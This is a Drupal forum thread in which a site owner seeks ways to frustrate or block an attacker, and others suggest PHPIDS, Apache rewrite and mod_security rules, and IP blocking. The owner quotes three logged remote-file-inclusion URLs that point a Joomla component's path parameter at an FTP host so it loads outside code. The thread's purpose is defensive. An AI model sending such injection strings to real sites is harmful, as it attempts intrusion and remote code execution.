By nancydru on

One of my sites is under bombardment by a malicious, albeit ineffective, attacker. His attempt end in 403 or 404 errors. Is there a way I can deliberately build in a 5-10 second delay before the error page is displayed. I think that would further frustrate him.

Categories: Drupal 5.x

Comments

WorldFallz’s picture

WorldFallz commented

http://drupal.org/project/phpids might be worth looking at
===
"Give a man a fish and you feed him for a day.
Teach a man to fish and you feed him for a lifetime." -- Lao Tzu
"God helps those who help themselves." -- Benjamin Franklin
"Search is your best friend." -- Worldfallz

nancydru’s picture

nancydru
she/her/hers
Primary language English
Location Boston
commented

I'll check it out. My search didn't find that one because it doesn't have "hacker" in it. I found Troll, but it doesn't look promising.

NancyDru

zeta ζ’s picture

zeta ζ commented

if the error page is php you could use sleep(int seconds)
___________________
It’s in the detaιls…
demonstration portfolio

nancydru’s picture

nancydru
she/her/hers
Primary language English
Location Boston
commented

http://drupal.org/node/131050

NancyDru

yelvington’s picture

yelvington commented

DOS attacks usually come from scripts and delays won't do anything but suck resources out of your server.

If there there is anything predictable about the requests, such as referrers, requested URLs, IP addresses, etc., you may be able to block them at the server level with a simple Apache directive.

With mod_access: http://httpd.apache.org/docs/1.3/mod/mod_access.html

With mod_rewrite: http://www.bhatt.id.au/article/41/

With mod_security: http://atomicplayboy.net/blog/2005/01/30/an-introduction-to-mod-security/

nancydru’s picture

nancydru
she/her/hers
Primary language English
Location Boston
commented

There are some similarities. Generally, they seem to try some string (a command of some kind) in several different forms. Such as

http://nanwich.info/sitedoc/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/old?
http://nanwich.info/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/1?
http://nanwich.info/sitedoc/table/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/1?

I have been reading articles on those facilities. The problem is that he keeps trying different strings and different IP addresses.

He won this time because I took the site offline for a while.

Nancy Dru (formerly Nancy W. until I got married to Drupal)

NancyDru

Anonymous’s picture

Anonymous (not verified) commented

Find the internet service providers of every ip adres that you are getting this from and report the matter.

.htaccess deny the ip addresses you do have (although if it is coming from people's pc's then you could be blocking potential visitors)

nancydru’s picture

nancydru
she/her/hers
Primary language English
Location Boston
commented

But most reports bounce. The few that didn't I never hear from again. Certainly I can block IPs, but I see lots of articles on the web that speak to the futility of doing so. Maybe it will help in the short run.

One thing I see in the requests is that at least half of them contain double slashes, which no real Drupal request would. I'm reading the Apache docs to see how to write a rule to block those to start with.

Nancy Dru (formerly Nancy W. until I got married to Drupal)

NancyDru

Anonymous’s picture

Anonymous (not verified) commented

Here are some more tips:

http://www.webmasterworld.com/webmaster/3222779.htm
http://forums.invisionpower.com/index.php?showtopic=270753
http://forums.invisionpower.com/index.php?showtopic=270133

nancydru’s picture

nancydru
she/her/hers
Primary language English
Location Boston
commented

These look more like hacking (injection) attacks rather than DOS, although their frequency could result in that.

And my host just said they don't have ModSecurity...

Nancy Dru (formerly Nancy W. until I got married to Drupal)

NancyDru